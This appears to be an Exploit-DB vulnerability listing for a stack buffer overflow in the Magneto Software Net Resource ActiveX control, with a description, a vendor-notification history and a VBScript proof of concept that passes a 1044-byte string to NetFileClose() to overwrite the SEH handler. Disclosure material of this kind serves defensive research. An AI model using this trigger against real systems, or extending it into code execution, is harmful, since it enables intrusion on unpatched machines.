Magneto Software Net Resource ActiveX NetFileClose SEH Overwrite POC

vendor:

Net Resource

by:

s4squatch

9,3

CVSS

HIGH

SEH Overwrite

119

CWE

Product Name: Net Resource

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Magneto Software Net Resource ActiveX NetFileClose SEH Overwrite POC

The vulnerability exists in the SKNetResource.ocx ActiveX control, which is part of the Magneto Software Net Resource package. The vulnerability is caused due to a boundary error within the NetFileClose() method when handling user-supplied input. This can be exploited to cause a stack-based buffer overflow by supplying a specially crafted argument to the method. This may allow an attacker to execute arbitrary code.

Mitigation:

No mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

<html>
<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>
<script language='vbscript'>
'Magneto Software Net Resource ActiveX NetFileClose SEH Overwrite POC
'Discovered by:  s4squatch of SecureState R&D Team
'Site:  www.securestate.com
'Date Discovered: 02/11/10
'www:  http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
'Download:  http://www.magnetosoft.com/downloads/SystemInfoPackSetup.exe
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'SKNetResource.ocx
'Function NetFileClose ( ByVal strServerName As String ,  ByVal dwFileId As Long ) As Long
'progid = "SKNETRESOURCELib.SKNetResource"

'SEH overwrite
arg1=String(1044, "A")
arg2=1
target.NetFileClose arg1 ,arg2 

</script>